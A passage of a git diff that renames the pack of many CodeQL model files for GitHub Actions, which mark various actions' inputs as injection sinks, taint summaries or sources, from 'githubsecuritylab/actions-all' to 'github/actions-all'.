"command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-lint-action.model.yml b/ql/lib/ext/bufbuild_buf-lint-action.model.yml index d0a88ff3167..1fa66b8ceb6 100644 --- a/ql/lib/ext/bufbuild_buf-lint-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-lint-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["bufbuild/buf-lint-action", "*", "input.buf_token", "env.BUF_TOKEN", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bufbuild/buf-lint-action", "*", "input.input", "command-injection", "manual"] diff --git a/ql/lib/ext/bufbuild_buf-setup-action.model.yml b/ql/lib/ext/bufbuild_buf-setup-action.model.yml index a29f84a55b5..f2fed75539b 100644 --- a/ql/lib/ext/bufbuild_buf-setup-action.model.yml +++ b/ql/lib/ext/bufbuild_buf-setup-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["bufbuild/buf-setup-action", "*", "input.buf_domain", "command-injection", "manual"] diff --git a/ql/lib/ext/cachix_cachix-action.model.yml b/ql/lib/ext/cachix_cachix-action.model.yml index 0e11fe45b42..dfaffaf87de 100644 --- a/ql/lib/ext/cachix_cachix-action.model.yml +++ b/ql/lib/ext/cachix_cachix-action.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["cachix/cachix-action", "*", "input.signingKey", "env.CACHIX_SIGNING_KEY", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cachix/cachix-action", "*", "input.installCommand", "command-injection", "manual"] diff --git a/ql/lib/ext/changesets_action.model.yml b/ql/lib/ext/changesets_action.model.yml index 7e0970034a5..7bab09bca76 100644 --- a/ql/lib/ext/changesets_action.model.yml +++ b/ql/lib/ext/changesets_action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["changesets/action", "*", "input.publish", "command-injection", "manual"] diff --git a/ql/lib/ext/cloudflare_wrangler-action.model.yml b/ql/lib/ext/cloudflare_wrangler-action.model.yml index 2f62f211da9..86759ad40d5 100644 --- a/ql/lib/ext/cloudflare_wrangler-action.model.yml +++ b/ql/lib/ext/cloudflare_wrangler-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cloudflare/wrangler-action", "*", "input.preCommands", "command-injection", "manual"] diff --git a/ql/lib/ext/coursier_cache-action.model.yml b/ql/lib/ext/coursier_cache-action.model.yml index f94ad242321..65474ba343d 100644 --- a/ql/lib/ext/coursier_cache-action.model.yml +++ b/ql/lib/ext/coursier_cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["coursier/cache-action", "*", "input.path", "env.COURSIER_CACHE", "taint", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml index 5872399881c..e3dd557084b 100644 --- a/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-chocolatey.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["crazy-max/ghaction-chocolatey", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml index 02c5dcd3cca..f3cb32b612f 100644 --- a/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml +++ b/ql/lib/ext/crazy-max_ghaction-import-gpg.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["crazy-max/ghaction-import-gpg", "*", "input.fingerprint", "output.fingerprint", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/csexton_release-asset-action.model.yml b/ql/lib/ext/csexton_release-asset-action.model.yml index 45bf0c57355..639ee965f42 100644 --- a/ql/lib/ext/csexton_release-asset-action.model.yml +++ b/ql/lib/ext/csexton_release-asset-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["csexton/release-asset-action", "*", "input.release-url", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml index 4ac3492c41c..40d03569c8d 100644 --- a/ql/lib/ext/cycjimmy_semantic-release-action.model.yml +++ b/ql/lib/ext/cycjimmy_semantic-release-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cycjimmy/semantic-release-action", "*", "input.semantic_version", "command-injection", "manual"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml index a48da0cedfc..ed20a562375 100644 --- a/ql/lib/ext/cypress-io_github-action.model.yml +++ b/ql/lib/ext/cypress-io_github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["cypress-io/github-action", "*", "env.GH_BRANCH", "branch", "manual"] diff --git a/ql/lib/ext/dailydotdev_action-devcard.model.yml b/ql/lib/ext/dailydotdev_action-devcard.model.yml index 6ca7aa86c06..22725484ea4 100644 --- a/ql/lib/ext/dailydotdev_action-devcard.model.yml +++ b/ql/lib/ext/dailydotdev_action-devcard.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dailydotdev/action-devcard", "*", "input.commit_branch", "sql-injection", "manual"] diff --git a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml index 11f1f10980f..d7839211e20 100644 --- a/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml +++ b/ql/lib/ext/danielpalme_reportgenerator-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["danielpalme/reportgenerator-github-action", "*", "input.toolpath", "command-injection", "manual"] diff --git a/ql/lib/ext/daspn_private-actions-checkout.model.yml b/ql/lib/ext/daspn_private-actions-checkout.model.yml index 9ed2cb7908b..3ff92757361 100644 --- a/ql/lib/ext/daspn_private-actions-checkout.model.yml +++ b/ql/lib/ext/daspn_private-actions-checkout.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["daspn/private-actions-checkout", "*", "input.actions_list", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml index 7f279f37a45..2e41b4f8eb5 100644 --- a/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml +++ b/ql/lib/ext/dawidd6_action-ansible-playbook.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dawidd6/action-ansible-playbook", "*", "input.playbook", "command-injection", "manual"] diff --git a/ql/lib/ext/dawidd6_action-download-artifact.model.yml b/ql/lib/ext/dawidd6_action-download-artifact.model.yml index 68f434f4797..62ff29bc9f0 100644 --- a/ql/lib/ext/dawidd6_action-download-artifact.model.yml +++ b/ql/lib/ext/dawidd6_action-download-artifact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["dawidd6/action-download-artifact", "*", "output.artifacts", "artifact", "manual"] diff --git a/ql/lib/ext/delaguardo_setup-clojure.model.yml b/ql/lib/ext/delaguardo_setup-clojure.model.yml index 890a47c79fc..af4e15da03b 100644 --- a/ql/lib/ext/delaguardo_setup-clojure.model.yml +++ b/ql/lib/ext/delaguardo_setup-clojure.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["delaguardo/setup-clojure", "*", "input.boot", "env.BOOT_VERSION", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml index aff5c330316..2dbf4718714 100644 --- a/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml +++ b/ql/lib/ext/determinatesystems_magic-nix-cache-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["determinatesystems/magic-nix-cache-action", "*", "input.source-url", "command-injection", "manual"] diff --git a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml index 8f5e22fa2d9..4bc7e251808 100644 --- a/ql/lib/ext/docker-practice_actions-setup-docker.model.yml +++ b/ql/lib/ext/docker-practice_actions-setup-docker.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["docker-practice/actions-setup-docker", "*", "input.docker_version", "command-injection", "manual"] diff --git a/ql/lib/ext/docker_build-push-action.model.yml b/ql/lib/ext/docker_build-push-action.model.yml index ff0131da99e..845ae1770ed 100644 --- a/ql/lib/ext/docker_build-push-action.model.yml +++ b/ql/lib/ext/docker_build-push-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["docker/build-push-action", "*", "input.context", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/endbug_latest-tag.model.yml b/ql/lib/ext/endbug_latest-tag.model.yml index 1d82fb8f836..780acdb98ff 100644 --- a/ql/lib/ext/endbug_latest-tag.model.yml +++ b/ql/lib/ext/endbug_latest-tag.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["endbug/latest-tag", "*", "input.ref", "command-injection", "manual"] diff --git a/ql/lib/ext/expo_expo-github-action.model.yml b/ql/lib/ext/expo_expo-github-action.model.yml index 1e4cc21dd13..038f1639d3c 100644 --- a/ql/lib/ext/expo_expo-github-action.model.yml +++ b/ql/lib/ext/expo_expo-github-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expo/expo-github-action", "*", "input.command", "command-injection", "manual"] diff --git a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml index ba729868a04..d948bda8bf4 100644 --- a/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml +++ b/ql/lib/ext/firebaseextended_action-hosting-deploy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["firebaseextended/action-hosting-deploy", "*", "input.firebaseToolsVersion", "command-injection", "manual"] diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml index 504f0693977..ed9eeb6b252 100644 --- a/ql/lib/ext/frabert_replace-string-action.model.yml +++ b/ql/lib/ext/frabert_replace-string-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["frabert/replace-string-action", "*", "input.string", "output.replaced", "taint", "manual"] diff --git a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml index 48267b6d082..f6441133c7a 100644 --- a/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml +++ b/ql/lib/ext/franzdiebold_github-env-vars-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["franzdiebold/github-env-vars-action", "*", "output.CI_PR_DESCRIPTION", "text", "manual"] diff --git a/ql/lib/ext/gabrielbb_xvfb-action.model.yml b/ql/lib/ext/gabrielbb_xvfb-action.model.yml index 26eea1d2341..357ffc1c94a 100644 --- a/ql/lib/ext/gabrielbb_xvfb-action.model.yml +++ b/ql/lib/ext/gabrielbb_xvfb-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gabrielbb/xvfb-action", "*", "input.run", "command-injection", "manual"] diff --git a/ql/lib/ext/game-ci_unity-builder.model.yml b/ql/lib/ext/game-ci_unity-builder.model.yml index 7993d827fa6..0288103fd0a 100644 --- a/ql/lib/ext/game-ci_unity-builder.model.yml +++ b/ql/lib/ext/game-ci_unity-builder.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["game-ci/unity-builder", "*", "input.cacheKey", "command-injection", "manual"] diff --git a/ql/lib/ext/game-ci_unity-test-runner.model.yml b/ql/lib/ext/game-ci_unity-test-runner.model.yml index de48ea5a709..05dca2f8262 100644 --- a/ql/lib/ext/game-ci_unity-test-runner.model.yml +++ b/ql/lib/ext/game-ci_unity-test-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["game-ci/unity-test-runner", "*", "input.artifactsPath", "output.artifactsPath", "taint", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml index 36a9b24f089..123dabe450e 100644 --- a/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml +++ b/ql/lib/ext/gautamkrishnar_blog-post-workflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gautamkrishnar/blog-post-workflow", "*", "input.item_exec", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml index f04f8dda6c8..a098666dba0 100644 --- a/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml +++ b/ql/lib/ext/generated/composite-actions/actions_actions-runner-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["actions/actions-runner-controller", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml index a37d6452d50..476c522f5ea 100644 --- a/ql/lib/ext/generated/composite-actions/adap_flower.model.yml +++ b/ql/lib/ext/generated/composite-actions/adap_flower.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["adap/flower", "*", "input.poetry-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml index 352eb51996a..ad369575c42 100644 --- a/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/agoric_agoric-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["agoric/agoric-sdk", "*", "input.xsnap-random-init", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml index 44f34c11cb3..e68306a454c 100644 --- a/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbnb_lottie-ios.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["airbnb/lottie-ios", "*", "input.xcode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml index 3fd2e46296a..923d267ac66 100644 --- a/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/composite-actions/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["airbytehq/airbyte", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml index 881374b6c90..9557cbbee80 100644 --- a/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/amazon-ion_ion-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["amazon-ion/ion-java", "*", "input.project_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml index 6d77c866dc2..eea604dc8dd 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_grype.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["anchore/grype", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml index 0b27c584584..5ee8503193b 100644 --- a/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml +++ b/ql/lib/ext/generated/composite-actions/anchore_syft.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["anchore/syft", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml index 911d3e57155..44795adc64a 100644 --- a/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml +++ b/ql/lib/ext/generated/composite-actions/angular_dev-infra.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["angular/dev-infra", "*", "input.firebase-public-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml index 1ac668cf55a..a1a7e28f572 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_ansible-lint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ansible/ansible-lint", "*", "input.args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml index 5cf121dcef2..792a00ea387 100644 --- a/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml +++ b/ql/lib/ext/generated/composite-actions/ansible_awx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ansible/awx", "*", "input.log-filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml index d946204e9b9..5ee9c5aefbe 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-datafusion.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/arrow-datafusion", "*", "input.rust-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml index c6839a7b004..8b438734d5d 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow-rs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/arrow-rs", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml index 9e708bbcc89..a6222605575 100644 --- a/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_arrow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/arrow", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml index cfb67540b17..07c4cc427c1 100644 --- a/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_bookkeeper.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/bookkeeper", "*", "input.mode", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml index 7186433e6d2..77adcd6151d 100644 --- a/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_brpc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/brpc", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml index d39aafe162f..fe453b3086d 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel-k.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/camel-k", "*", "input.test-suite", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml index a3b53b3ec96..6d5296ba6d1 100644 --- a/ql/lib/ext/generated/composite-actions/apache_camel.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_camel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/camel", "*", "input.end-commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml index 2a35d22a10e..14600fdc23e 100644 --- a/ql/lib/ext/generated/composite-actions/apache_flink.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_flink.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/flink", "*", "input.maven-parameters", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml index 156d244ece2..a67988b08aa 100644 --- a/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_incubator-kie-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["apache/incubator-kie-tools", "*", "input.pnpm_filter_string", "output.pnpm_filter_string", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml index fcda4b3dfec..663702e6418 100644 --- a/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_nuttx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/nuttx", "*", "input.haskell", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml index 84877f57d8c..de7a728d096 100644 --- a/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_opendal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/opendal", "*", "input.feature", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml index dcb93d013a0..360eb948595 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pekko.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/pekko", "*", "input.upload", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml index 4776bb79067..290712830e2 100644 --- a/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_pulsar-helm-chart.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/pulsar-helm-chart", "*", "input.limit-access-to-users", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml index 2540e6a76ca..d58063c2452 100644 --- a/ql/lib/ext/generated/composite-actions/apache_superset.model.yml +++ b/ql/lib/ext/generated/composite-actions/apache_superset.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["apache/superset", "*", "input.requirements-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml index 525064de6a9..784627c32ab 100644 --- a/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml +++ b/ql/lib/ext/generated/composite-actions/appflowy-io_appflowy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["appflowy-io/appflowy", "*", "input.test_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml index b46d5a3ee6a..b4f5866b86d 100644 --- a/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/aptos-labs_aptos-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["aptos-labs/aptos-core", "*", "input.GIT_CREDENTIALS", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml index 631457c813e..77a7407adfb 100644 --- a/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml +++ b/ql/lib/ext/generated/composite-actions/archivesspace_archivesspace.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - 